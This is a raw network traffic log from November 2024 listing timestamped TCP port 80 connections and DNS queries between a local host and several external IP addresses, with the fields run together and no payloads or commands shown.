                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:57.879585028 CET8050268172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:58.538811922 CET8050268172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:58.538913012 CET5026880192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:58.539345980 CET5026880192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:58.540785074 CET5026980192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:58.544148922 CET8050268172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:58.545677900 CET8050269172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:58.545767069 CET5026980192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:58.545826912 CET5026980192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:58.545826912 CET5026980192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:58.550714970 CET8050269172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:58.550729990 CET8050269172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:59.206993103 CET8050269172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:59.207125902 CET5026980192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:59.207125902 CET5026980192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:59.212289095 CET8050269172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:59.226514101 CET5027080192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:59.231918097 CET805027018.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:59.232006073 CET5027080192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:15.032033920 CET805027744.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:15.036087990 CET5027780192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:15.036202908 CET5027780192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:15.036221027 CET5027780192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:15.041091919 CET805027744.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:15.041102886 CET805027744.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:15.721360922 CET805027744.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:15.721697092 CET5027780192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:15.727406979 CET805027744.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:15.727487087 CET5027780192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:15.737147093 CET5027880192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:15.742106915 CET805027818.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:15.742202997 CET5027880192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:15.742400885 CET5027880192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:15.742424011 CET5027880192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:15.747292042 CET805027818.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:15.747302055 CET805027818.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:17.211138010 CET805027818.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:17.211415052 CET5027880192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:17.217098951 CET805027818.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:17.217398882 CET5027880192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:17.709829092 CET805027482.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:17.710037947 CET5027480192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:17.710154057 CET5027480192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:17.714988947 CET805027482.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:17.721704960 CET5028080192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:17.726641893 CET805028082.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:17.726794004 CET5028080192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:17.727005005 CET5028080192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:17.727092981 CET5028080192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:17.731779099 CET805028082.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:17.731853008 CET805028082.112.184.197192.168.2.10
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:39.913444996 CET53623741.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:39.922405005 CET5471753192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:39.930114031 CET53547171.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:41.386504889 CET5468853192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:41.393667936 CET53546881.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:41.443006992 CET6239553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:41.451359034 CET53623951.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:43.414771080 CET6523953192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:43.421801090 CET53652391.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:43.460711956 CET5065853192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:43.467649937 CET53506581.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:43.472605944 CET5138153192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:43.480128050 CET53513811.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:44.891488075 CET5690753192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:44.898901939 CET53569071.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:01.633254051 CET6215653192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:01.640888929 CET53621561.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:11.778592110 CET5306553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:12.791233063 CET5306553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:13.475440979 CET53530651.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:13.475475073 CET53530651.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:14.919965982 CET5149953192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:14.927073002 CET53514991.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:15.204062939 CET5574553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:15.211215973 CET53557451.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:15.788466930 CET6125953192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:15.795874119 CET53612591.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:17.522500038 CET6132653192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:17.529592037 CET53613261.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:17.800151110 CET5317953192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:17.807409048 CET53531791.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:18.547219992 CET5762553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:18.554377079 CET53576251.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:18.600056887 CET5941053192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:18.607156992 CET53594101.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:19.231096029 CET5559453192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:19.238786936 CET53555941.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.543577909 CET5649953192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.551224947 CET53564991.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.617479086 CET5300753192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.625433922 CET53530071.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.626003981 CET6238953192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.633425951 CET53623891.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.113817930 CET6540553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.121123075 CET53654051.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.122668982 CET5737353192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.129301071 CET53573731.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.129780054 CET5371053192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.136902094 CET53537101.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.375494957 CET6540353192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.382411003 CET53654031.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:23.486289978 CET5944053192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:23.493922949 CET53594401.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:24.290910959 CET5525753192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:24.298443079 CET53552571.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:25.806731939 CET5897953192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:04.510721922 CET53514591.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:05.029887915 CET5775853192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:05.037442923 CET53577581.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:05.038110971 CET5645253192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:05.046273947 CET53564521.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:05.180902004 CET5688553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:05.188525915 CET53568851.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:05.997026920 CET5679353192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:06.007972956 CET53567931.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:06.766263962 CET5598653192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:06.774127007 CET53559861.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:07.477111101 CET5248253192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:07.484714031 CET53524821.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:07.990715027 CET5255353192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:07.998799086 CET53525531.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:08.182025909 CET5034153192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:08.190537930 CET53503411.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.046464920 CET5768953192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.054012060 CET53576891.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.934986115 CET5064553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.942346096 CET53506451.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:10.023171902 CET4931953192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:10.036597967 CET53493191.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:10.607137918 CET6343553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:10.614134073 CET53634351.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:11.537195921 CET5858553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:12.137264967 CET53585851.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:12.420738935 CET5890353192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:12.428381920 CET53589031.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:13.259460926 CET6296953192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:13.267740965 CET53629691.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:13.631128073 CET5283053192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:13.639168978 CET53528301.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:13.714334011 CET5604853192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:14.541354895 CET53560481.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:15.204775095 CET5775753192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:15.211981058 CET53577571.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:15.415169001 CET6205553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:15.423075914 CET53620551.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:16.301273108 CET5711653192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:16.309216976 CET53571161.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:16.409352064 CET6256153192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:16.416829109 CET53625611.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:17.831660032 CET5250253192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:17.853405952 CET5120453192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.112137079 CET53512041.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.112476110 CET53525021.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.802175045 CET5989553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.996330023 CET53598951.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:19.336687088 CET5072753192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:19.343938112 CET53507271.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:19.732163906 CET6544253192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:19.739379883 CET53654421.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:21.190749884 CET4945453192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:21.200248003 CET53494541.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:21.230139971 CET6209053192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:42.794908047 CET53579461.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:43.111144066 CET5640053192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:43.118885994 CET53564001.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:44.571695089 CET6175553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:44.670675993 CET53617551.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:45.359303951 CET5202953192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:45.366693020 CET53520291.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:45.403120995 CET6005553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:45.410377026 CET53600551.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:46.217324972 CET6357253192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:46.224822044 CET53635721.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:46.275027037 CET6504353192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:46.282912016 CET53650431.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:46.962408066 CET5458753192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:46.969782114 CET53545871.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:47.701958895 CET6374253192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:47.709722042 CET53637421.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:47.827322960 CET4937153192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:47.834953070 CET53493711.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:48.581064939 CET5894953192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:48.588566065 CET53589491.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:48.807296038 CET5303053192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:48.814775944 CET53530301.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:49.300575018 CET6100653192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:49.308722973 CET53610061.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:50.447861910 CET5042453192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:50.448919058 CET6299753192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:50.455111980 CET53504241.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:50.456008911 CET53629971.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:51.333614111 CET5092953192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:51.340938091 CET53509291.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:51.471158028 CET5754753192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:51.478612900 CET53575471.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:52.433979988 CET5134253192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:52.442570925 CET53513421.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:52.967678070 CET6427753192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:52.975481033 CET53642771.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:53.308912992 CET5724853192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:53.318151951 CET53572481.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:53.648130894 CET4953953192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:53.655523062 CET53495391.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:54.497812033 CET6457753192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:54.505980968 CET53645771.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:54.814460039 CET6241753192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:54.822205067 CET53624171.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:55.992954969 CET5825453192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:56.000114918 CET53582541.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:56.326087952 CET5721853192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:56.334965944 CET53572181.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:57.008620977 CET5933453192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:57.009326935 CET4955253192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:57.016148090 CET53593341.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:57.017489910 CET53495521.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:58.054044008 CET5854153192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:58.061002970 CET53585411.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:58.214929104 CET5801153192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.109278917 CET53552621.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.250298023 CET5345853192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.257509947 CET53534581.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.795097113 CET5668753192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.802278996 CET53566871.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:20.299884081 CET5637853192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:20.307353973 CET53563781.1.1.1192.168.2.10
